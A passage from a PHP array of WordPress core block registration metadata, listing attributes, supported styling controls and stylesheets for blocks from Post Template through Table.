'__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalWritingMode' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'style' => 'wp-block-post-navigation-link' ), 'post-template' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/post-template', 'title' => 'Post Template', 'category' => 'theme', 'parent' => array( 'core/query' ), 'description' => 'Contains the block elements used to render a post, like the title, date, featured image, content or excerpt, and more.', 'textdomain' => 'default', 'usesContext' => array( 'queryId', 'query', 'queryContext', 'displayLayout', 'templateSlug', 'previewPostType', 'enhancedPagination' ), 'supports' => array( 'reusable' => false, 'html' => false, 'align' => array( 'wide', 'full' ), 'layout' => true, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'spacing' => array( 'blockGap' => array( '__experimentalDefault' => '1.25em' ), '__experimentalDefaultControls' => array( 'blockGap' => true ) ) ), 'style' => 'wp-block-post-template', 'editorStyle' => 'wp-block-post-template-editor' ), 'post-terms' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/post-terms', 'title' => 'Post Terms', 'category' => 'theme', 'description' => 'Post terms.', 'textdomain' => 'default', 'attributes' => array( 'term' => array( 'type' => 'string' ), 'textAlign' => array( 'type' => 'string' ), 'separator' => array( 'type' => 'string', 'default' => ', ' ), 'prefix' => array( 'type' => 'string', 'default' => '' ), 'suffix' => array( 'type' => 'string', 'default' => '' ) ), 'usesContext' => array( 'postId', 'postType' ), 'supports' => array( 'html' => false, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, 'link' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'style' => 'wp-block-post-terms' ), 'post-title' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/post-title', 'title' => 'Title', 'category' => 'theme', 'description' => 'Displays the title of a post, page, or any other content-type.', 'textdomain' => 'default', 'usesContext' => array( 'postId', 'postType', 'queryId' ), 'attributes' => array( 'textAlign' => array( 'type' => 'string' ), 'level' => array( 'type' => 'number', 'default' => 2 ), 'isLink' => array( 'type' => 'boolean', 'default' => false ), 'rel' => array( 'type' => 'string', 'attribute' => 'rel', 'default' => '' ), 'linkTarget' => array( 'type' => 'string', 'default' => '_self' ) ), 'supports' => array( 'align' => array( 'wide', 'full' ), 'html' => false, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, 'link' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true, 'fontAppearance' => true, 'textTransform' => true ) ) ), 'style' => 'wp-block-post-title' ), 'preformatted' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/preformatted', 'title' => 'Preformatted', 'category' => 'text', 'description' => 'Add text that respects your spacing and tabs, and also allows styling.', 'textdomain' => 'default', 'attributes' => array( 'content' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'pre', 'default' => '', '__unstablePreserveWhiteSpace' => true, '__experimentalRole' => 'content' ) ), 'supports' => array( 'anchor' => true, 'color' => array( 'gradients' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'padding' => true, 'margin' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'style' => 'wp-block-preformatted' ), 'pullquote' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/pullquote', 'title' => 'Pullquote', 'category' => 'text', 'description' => 'Give special visual emphasis to a quote from your text.', 'textdomain' => 'default', 'attributes' => array( 'value' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'p', '__experimentalRole' => 'content' ), 'citation' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'cite', 'default' => '', '__experimentalRole' => 'content' ), 'textAlign' => array( 'type' => 'string' ) ), 'supports' => array( 'anchor' => true, 'align' => array( 'left', 'right', 'wide', 'full' ), 'color' => array( 'gradients' => true, 'background' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true, 'fontAppearance' => true ) ), '__experimentalBorder' => array( 'color' => true, 'radius' => true, 'style' => true, 'width' => true, '__experimentalDefaultControls' => array( 'color' => true, 'radius' => true, 'style' => true, 'width' => true ) ), '__experimentalStyle' => array( 'typography' => array( 'fontSize' => '1.5em', 'lineHeight' => '1.6' ) ) ), 'editorStyle' => 'wp-block-pullquote-editor', 'style' => 'wp-block-pullquote' ), 'query' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/query', 'title' => 'Query Loop', 'category' => 'theme', 'description' => 'An advanced block that allows displaying post types based on different query parameters and visual configurations.', 'textdomain' => 'default', 'attributes' => array( 'queryId' => array( 'type' => 'number' ), 'query' => array( 'type' => 'object', 'default' => array( 'perPage' => null, 'pages' => 0, 'offset' => 0, 'postType' => 'post', 'order' => 'desc', 'orderBy' => 'date', 'author' => '', 'search' => '', 'exclude' => array( ), 'sticky' => '', 'inherit' => true, 'taxQuery' => null, 'parents' => array( ) ) ), 'tagName' => array( 'type' => 'string', 'default' => 'div' ), 'namespace' => array( 'type' => 'string' ), 'enhancedPagination' => array( 'type' => 'boolean', 'default' => false ) ), 'providesContext' => array( 'queryId' => 'queryId', 'query' => 'query', 'displayLayout' => 'displayLayout', 'enhancedPagination' => 'enhancedPagination' ), 'supports' => array( 'align' => array( 'wide', 'full' ), 'html' => false, 'layout' => true ), 'editorStyle' => 'wp-block-query-editor', 'style' => 'wp-block-query', 'viewScript' => 'file:./view.min.js' ), 'query-no-results' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/query-no-results', 'title' => 'No results', 'category' => 'theme', 'description' => 'Contains the block elements used to render content when no query results are found.', 'parent' => array( 'core/query' ), 'textdomain' => 'default', 'usesContext' => array( 'queryId', 'query' ), 'supports' => array( 'align' => true, 'reusable' => false, 'html' => false, 'color' => array( 'gradients' => true, 'link' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'query-pagination' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/query-pagination', 'title' => 'Pagination', 'category' => 'theme', 'parent' => array( 'core/query' ), 'description' => 'Displays a paginated navigation to next/previous set of posts, when applicable.', 'textdomain' => 'default', 'attributes' => array( 'paginationArrow' => array( 'type' => 'string', 'default' => 'none' ), 'showLabel' => array( 'type' => 'boolean', 'default' => true ) ), 'usesContext' => array( 'queryId', 'query' ), 'providesContext' => array( 'paginationArrow' => 'paginationArrow', 'showLabel' => 'showLabel' ), 'supports' => array( 'align' => true, 'reusable' => false, 'html' => false, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, 'link' => true ) ), 'layout' => array( 'allowSwitching' => false, 'allowInheriting' => false, 'default' => array( 'type' => 'flex' ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-query-pagination-editor', 'style' => 'wp-block-query-pagination' ), 'query-pagination-next' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/query-pagination-next', 'title' => 'Next Page', 'category' => 'theme', 'parent' => array( 'core/query-pagination' ), 'description' => 'Displays the next posts page link.', 'textdomain' => 'default', 'attributes' => array( 'label' => array( 'type' => 'string' ) ), 'usesContext' => array( 'queryId', 'query', 'paginationArrow', 'showLabel', 'enhancedPagination' ), 'supports' => array( 'reusable' => false, 'html' => false, 'color' => array( 'gradients' => true, 'text' => false, '__experimentalDefaultControls' => array( 'background' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'query-pagination-numbers' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/query-pagination-numbers', 'title' => 'Page Numbers', 'category' => 'theme', 'parent' => array( 'core/query-pagination' ), 'description' => 'Displays a list of page numbers for pagination', 'textdomain' => 'default', 'attributes' => array( 'midSize' => array( 'type' => 'number', 'default' => 2 ) ), 'usesContext' => array( 'queryId', 'query', 'enhancedPagination' ), 'supports' => array( 'reusable' => false, 'html' => false, 'color' => array( 'gradients' => true, 'text' => false, '__experimentalDefaultControls' => array( 'background' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-query-pagination-numbers-editor' ), 'query-pagination-previous' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/query-pagination-previous', 'title' => 'Previous Page', 'category' => 'theme', 'parent' => array( 'core/query-pagination' ), 'description' => 'Displays the previous posts page link.', 'textdomain' => 'default', 'attributes' => array( 'label' => array( 'type' => 'string' ) ), 'usesContext' => array( 'queryId', 'query', 'paginationArrow', 'showLabel', 'enhancedPagination' ), 'supports' => array( 'reusable' => false, 'html' => false, 'color' => array( 'gradients' => true, 'text' => false, '__experimentalDefaultControls' => array( 'background' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ) ), 'query-title' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/query-title', 'title' => 'Query Title', 'category' => 'theme', 'description' => 'Display the query title.', 'textdomain' => 'default', 'attributes' => array( 'type' => array( 'type' => 'string' ), 'textAlign' => array( 'type' => 'string' ), 'level' => array( 'type' => 'number', 'default' => 1 ), 'showPrefix' => array( 'type' => 'boolean', 'default' => true ), 'showSearchTerm' => array( 'type' => 'boolean', 'default' => true ) ), 'supports' => array( 'align' => array( 'wide', 'full' ), 'html' => false, 'color' => array( 'gradients' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontStyle' => true, '__experimentalFontWeight' => true, '__experimentalLetterSpacing' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalDefaultControls' => array( 'fontSize' => true, 'fontAppearance' => true, 'textTransform' => true ) ) ), 'style' => 'wp-block-query-title' ), 'quote' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/quote', 'title' => 'Quote', 'category' => 'text', 'description' => 'Give quoted text visual emphasis. "In quoting others, we cite ourselves." — Julio Cortázar', 'keywords' => array( 'blockquote', 'cite' ), 'textdomain' => 'default', 'attributes' => array( 'value' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'blockquote', 'multiline' => 'p', 'default' => '', '__experimentalRole' => 'content' ), 'citation' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'cite', 'default' => '', '__experimentalRole' => 'content' ), 'align' => array( 'type' => 'string' ) ), 'supports' => array( 'anchor' => true, 'html' => false, '__experimentalOnEnter' => true, '__experimentalOnMerge' => true, 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true, 'fontAppearance' => true ) ), 'color' => array( 'gradients' => true, 'heading' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ) ), 'styles' => array( array( 'name' => 'default', 'label' => 'Default', 'isDefault' => true ), array( 'name' => 'plain', 'label' => 'Plain' ) ), 'editorStyle' => 'wp-block-quote-editor', 'style' => 'wp-block-quote' ), 'read-more' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/read-more', 'title' => 'Read More', 'category' => 'theme', 'description' => 'Displays the link of a post, page, or any other content-type.', 'textdomain' => 'default', 'attributes' => array( 'content' => array( 'type' => 'string' ), 'linkTarget' => array( 'type' => 'string', 'default' => '_self' ) ), 'usesContext' => array( 'postId' ), 'supports' => array( 'html' => false, 'color' => array( 'gradients' => true, 'text' => true ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalLetterSpacing' => true, '__experimentalTextDecoration' => true, '__experimentalDefaultControls' => array( 'fontSize' => true, 'textDecoration' => true ) ), 'spacing' => array( 'margin' => array( 'top', 'bottom' ), 'padding' => true, '__experimentalDefaultControls' => array( 'padding' => true ) ), '__experimentalBorder' => array( 'color' => true, 'radius' => true, 'width' => true, '__experimentalDefaultControls' => array( 'width' => true ) ) ), 'style' => 'wp-block-read-more' ), 'rss' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/rss', 'title' => 'RSS', 'category' => 'widgets', 'description' => 'Display entries from any RSS or Atom feed.', 'keywords' => array( 'atom', 'feed' ), 'textdomain' => 'default', 'attributes' => array( 'columns' => array( 'type' => 'number', 'default' => 2 ), 'blockLayout' => array( 'type' => 'string', 'default' => 'list' ), 'feedURL' => array( 'type' => 'string', 'default' => '' ), 'itemsToShow' => array( 'type' => 'number', 'default' => 5 ), 'displayExcerpt' => array( 'type' => 'boolean', 'default' => false ), 'displayAuthor' => array( 'type' => 'boolean', 'default' => false ), 'displayDate' => array( 'type' => 'boolean', 'default' => false ), 'excerptLength' => array( 'type' => 'number', 'default' => 55 ) ), 'supports' => array( 'align' => true, 'html' => false ), 'editorStyle' => 'wp-block-rss-editor', 'style' => 'wp-block-rss' ), 'search' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/search', 'title' => 'Search', 'category' => 'widgets', 'description' => 'Help visitors find your content.', 'keywords' => array( 'find' ), 'textdomain' => 'default', 'attributes' => array( 'label' => array( 'type' => 'string', '__experimentalRole' => 'content' ), 'showLabel' => array( 'type' => 'boolean', 'default' => true ), 'placeholder' => array( 'type' => 'string', 'default' => '', '__experimentalRole' => 'content' ), 'width' => array( 'type' => 'number' ), 'widthUnit' => array( 'type' => 'string' ), 'buttonText' => array( 'type' => 'string', '__experimentalRole' => 'content' ), 'buttonPosition' => array( 'type' => 'string', 'default' => 'button-outside' ), 'buttonUseIcon' => array( 'type' => 'boolean', 'default' => false ), 'query' => array( 'type' => 'object', 'default' => array( ) ), 'buttonBehavior' => array( 'type' => 'string', 'default' => 'expand-searchfield' ), 'isSearchFieldHidden' => array( 'type' => 'boolean', 'default' => false ) ), 'supports' => array( 'align' => array( 'left', 'center', 'right' ), 'color' => array( 'gradients' => true, '__experimentalSkipSerialization' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'interactivity' => true, 'typography' => array( '__experimentalSkipSerialization' => true, '__experimentalSelector' => '.wp-block-search__label, .wp-block-search__input, .wp-block-search__button', 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), '__experimentalBorder' => array( 'color' => true, 'radius' => true, 'width' => true, '__experimentalSkipSerialization' => true, '__experimentalDefaultControls' => array( 'color' => true, 'radius' => true, 'width' => true ) ), 'html' => false ), 'viewScript' => 'file:./view.min.js', 'editorStyle' => 'wp-block-search-editor', 'style' => 'wp-block-search' ), 'separator' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/separator', 'title' => 'Separator', 'category' => 'design', 'description' => 'Create a break between ideas or sections with a horizontal separator.', 'keywords' => array( 'horizontal-line', 'hr', 'divider' ), 'textdomain' => 'default', 'attributes' => array( 'opacity' => array( 'type' => 'string', 'default' => 'alpha-channel' ) ), 'supports' => array( 'anchor' => true, 'align' => array( 'center', 'wide', 'full' ), 'color' => array( 'enableContrastChecker' => false, '__experimentalSkipSerialization' => true, 'gradients' => true, 'background' => true, 'text' => false, '__experimentalDefaultControls' => array( 'background' => true ) ), 'spacing' => array( 'margin' => array( 'top', 'bottom' ) ) ), 'styles' => array( array( 'name' => 'default', 'label' => 'Default', 'isDefault' => true ), array( 'name' => 'wide', 'label' => 'Wide Line' ), array( 'name' => 'dots', 'label' => 'Dots' ) ), 'editorStyle' => 'wp-block-separator-editor', 'style' => 'wp-block-separator' ), 'shortcode' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/shortcode', 'title' => 'Shortcode', 'category' => 'widgets', 'description' => 'Insert additional custom elements with a WordPress shortcode.', 'textdomain' => 'default', 'attributes' => array( 'text' => array( 'type' => 'string', 'source' => 'raw' ) ), 'supports' => array( 'className' => false, 'customClassName' => false, 'html' => false ), 'editorStyle' => 'wp-block-shortcode-editor' ), 'site-logo' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/site-logo', 'title' => 'Site Logo', 'category' => 'theme', 'description' => 'Display an image to represent this site. Update this block and the changes apply everywhere.', 'textdomain' => 'default', 'attributes' => array( 'width' => array( 'type' => 'number' ), 'isLink' => array( 'type' => 'boolean', 'default' => true ), 'linkTarget' => array( 'type' => 'string', 'default' => '_self' ), 'shouldSyncIcon' => array( 'type' => 'boolean' ) ), 'example' => array( 'viewportWidth' => 500, 'attributes' => array( 'width' => 350, 'className' => 'block-editor-block-types-list__site-logo-example' ) ), 'supports' => array( 'html' => false, 'align' => true, 'alignWide' => false, 'color' => array( '__experimentalDuotone' => 'img, .components-placeholder__illustration, .components-placeholder::before', 'text' => false, 'background' => false ), 'spacing' => array( 'margin' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ) ), 'styles' => array( array( 'name' => 'default', 'label' => 'Default', 'isDefault' => true ), array( 'name' => 'rounded', 'label' => 'Rounded' ) ), 'editorStyle' => 'wp-block-site-logo-editor', 'style' => 'wp-block-site-logo' ), 'site-tagline' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/site-tagline', 'title' => 'Site Tagline', 'category' => 'theme', 'description' => 'Describe in a few words what the site is about. The tagline can be used in search results or when sharing on social networks even if it’s not displayed in the theme design.', 'keywords' => array( 'description' ), 'textdomain' => 'default', 'attributes' => array( 'textAlign' => array( 'type' => 'string' ) ), 'example' => array( ), 'supports' => array( 'align' => array( 'wide', 'full' ), 'html' => false, 'color' => array( 'gradients' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalFontStyle' => true, '__experimentalFontWeight' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-site-tagline-editor' ), 'site-title' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/site-title', 'title' => 'Site Title', 'category' => 'theme', 'description' => 'Displays the name of this site. Update the block, and the changes apply everywhere it’s used. This will also appear in the browser title bar and in search results.', 'textdomain' => 'default', 'attributes' => array( 'level' => array( 'type' => 'number', 'default' => 1 ), 'textAlign' => array( 'type' => 'string' ), 'isLink' => array( 'type' => 'boolean', 'default' => true ), 'linkTarget' => array( 'type' => 'string', 'default' => '_self' ) ), 'example' => array( 'viewportWidth' => 500 ), 'supports' => array( 'align' => array( 'wide', 'full' ), 'html' => false, 'color' => array( 'gradients' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true, 'link' => true ) ), 'spacing' => array( 'padding' => true, 'margin' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalFontStyle' => true, '__experimentalFontWeight' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true, 'lineHeight' => true, 'fontAppearance' => true, 'letterSpacing' => true, 'textTransform' => true ) ) ), 'editorStyle' => 'wp-block-site-title-editor', 'style' => 'wp-block-site-title' ), 'social-link' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/social-link', 'title' => 'Social Icon', 'category' => 'widgets', 'parent' => array( 'core/social-links' ), 'description' => 'Display an icon linking to a social media profile or site.', 'textdomain' => 'default', 'attributes' => array( 'url' => array( 'type' => 'string' ), 'service' => array( 'type' => 'string' ), 'label' => array( 'type' => 'string' ), 'rel' => array( 'type' => 'string' ) ), 'usesContext' => array( 'openInNewTab', 'showLabels', 'iconColor', 'iconColorValue', 'iconBackgroundColor', 'iconBackgroundColorValue' ), 'supports' => array( 'reusable' => false, 'html' => false ), 'editorStyle' => 'wp-block-social-link-editor' ), 'social-links' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/social-links', 'title' => 'Social Icons', 'category' => 'widgets', 'description' => 'Display icons linking to your social media profiles or sites.', 'keywords' => array( 'links' ), 'textdomain' => 'default', 'attributes' => array( 'iconColor' => array( 'type' => 'string' ), 'customIconColor' => array( 'type' => 'string' ), 'iconColorValue' => array( 'type' => 'string' ), 'iconBackgroundColor' => array( 'type' => 'string' ), 'customIconBackgroundColor' => array( 'type' => 'string' ), 'iconBackgroundColorValue' => array( 'type' => 'string' ), 'openInNewTab' => array( 'type' => 'boolean', 'default' => false ), 'showLabels' => array( 'type' => 'boolean', 'default' => false ), 'size' => array( 'type' => 'string' ) ), 'providesContext' => array( 'openInNewTab' => 'openInNewTab', 'showLabels' => 'showLabels', 'iconColor' => 'iconColor', 'iconColorValue' => 'iconColorValue', 'iconBackgroundColor' => 'iconBackgroundColor', 'iconBackgroundColorValue' => 'iconBackgroundColorValue' ), 'supports' => array( 'align' => array( 'left', 'center', 'right' ), 'anchor' => true, '__experimentalExposeControlsToChildren' => true, 'layout' => array( 'allowSwitching' => false, 'allowInheriting' => false, 'allowVerticalAlignment' => false, 'default' => array( 'type' => 'flex' ) ), 'color' => array( 'enableContrastChecker' => false, 'background' => true, 'gradients' => true, 'text' => false, '__experimentalDefaultControls' => array( 'background' => false ) ), 'spacing' => array( 'blockGap' => array( 'horizontal', 'vertical' ), 'margin' => true, 'padding' => true, 'units' => array( 'px', 'em', 'rem', 'vh', 'vw' ), '__experimentalDefaultControls' => array( 'blockGap' => true, 'margin' => true, 'padding' => false ) ) ), 'styles' => array( array( 'name' => 'default', 'label' => 'Default', 'isDefault' => true ), array( 'name' => 'logos-only', 'label' => 'Logos Only' ), array( 'name' => 'pill-shape', 'label' => 'Pill Shape' ) ), 'editorStyle' => 'wp-block-social-links-editor', 'style' => 'wp-block-social-links' ), 'spacer' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/spacer', 'title' => 'Spacer', 'category' => 'design', 'description' => 'Add white space between blocks and customize its height.', 'textdomain' => 'default', 'attributes' => array( 'height' => array( 'type' => 'string', 'default' => '100px' ), 'width' => array( 'type' => 'string' ) ), 'usesContext' => array( 'orientation' ), 'supports' => array( 'anchor' => true, 'spacing' => array( 'margin' => array( 'top', 'bottom' ), '__experimentalDefaultControls' => array( 'margin' => true ) ) ), 'editorStyle' => 'wp-block-spacer-editor', 'style' => 'wp-block-spacer' ), 'table' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/table', 'title' => 'Table', 'category' => 'text', 'description' => 'Create structured content in rows and columns to display information.', 'textdomain' => 'default', 'attributes' => array( 'hasFixedLayout' => array( 'type' => 'boolean', 'default' => false ), 'caption' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'figcaption', 'default' => '' ), 'head' => array( 'type' => 'array', 'default' => array( ), 'source' => 'query', 'selector' => 'thead tr', 'query' => array( 'cells' => array( 'type' => 'array', 'default' => array( ), 'source' => 'query', 'selector' => 'td,th', 'query' => array( 'content' => array( 'type' => 'string', 'source' => 'html' ), 'tag' => array( 'type' => 'string', 'default' => 'td', 'source' => 'tag' ), 'scope' => array( 'type' => 'string', 'source' => 'attribute', 'attribute' => 'scope' ), 'align' => array( 'type' => 'string', 'source' => 'attribute', 'attribute' => 'data-align' ), 'colspan' => array( 'type' => 'string', 'source' => 'attribute', 'attribute' => 'colspan' ), 'rowspan' => array( 'type' => 'string', 'source' => 'attribute', 'attribute' => 'rowspan' ) ) ) ) ), 'body' => array( 'type' => 'array', 'default' => array( ), 'source' => 'query', 'selector' => 'tbody tr', 'query' => array( 'cells' => array( 'type' => 'array', 'default' => array( ), 'source' => 'query', 'selector' => 'td,th', 'query' => array( 'content' => array( 'type' => 'string', 'source' => 'html' ), 'tag' => array( 'type' => 'string', 'default' => 'td', 'source' => 'tag' ), 'scope' => array( 'type' => 'string', 'source' => 'attribute', 'attribute' => 'scope' ), 'align' => array( 'type' => 'string', 'source' => 'attribute', 'attribute' => 'data-align' ), 'colspan' => array( 'type' => 'string', 'source' => 'attribute', 'attribute' => 'colspan' ), 'rowspan' => array( 'type' => 'string', 'source' => 'attribute', 'attribute' => 'rowspan' ) ) ) ) ), 'foot' => array( 'type' => 'array', 'default' => array( ), 'source' => 'query', 'selector' => 'tfoot tr', 'query' => array( 'cells' => array( 'type' => 'array', 'default' => array( ), 'source' => 'query', 'selector' => 'td,th', 'query' => array( 'content' => array( 'type' => 'string', 'source' => 'html' ), 'tag' => array( 'type' => 'string', 'default' => 'td', 'source' => 'tag' ), 'scope' => array( 'type' => 'string', 'source' => 'attribute', 'attribute' => 'scope' ), 'align' => array( 'type' => 'string', 'source' => 'attribute', 'attribute' => 'data-align' ), 'colspan' => array( 'type' => 'string', 'source' => 'attribute', 'attribute' => 'colspan' ), 'rowspan' => array( 'type' => 'string', 'source' => 'attribute', 'attribute' => 'rowspan' ) ) ) ) ) ), 'supports' => array( 'anchor' => true, 'align' => true, 'color' => array( '__experimentalSkipSerialization' => true, 'gradients' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'margin' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontStyle' => true, '__experimentalFontWeight' => true, '__experimentalLetterSpacing' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), '__experimentalBorder' => array( '__experimentalSkipSerialization' => true, 'color' => true, 'style' => true, 'width' => true, '__experimentalDefaultControls' => array( 'color' => true, 'style' => true, 'width' => true ) ), 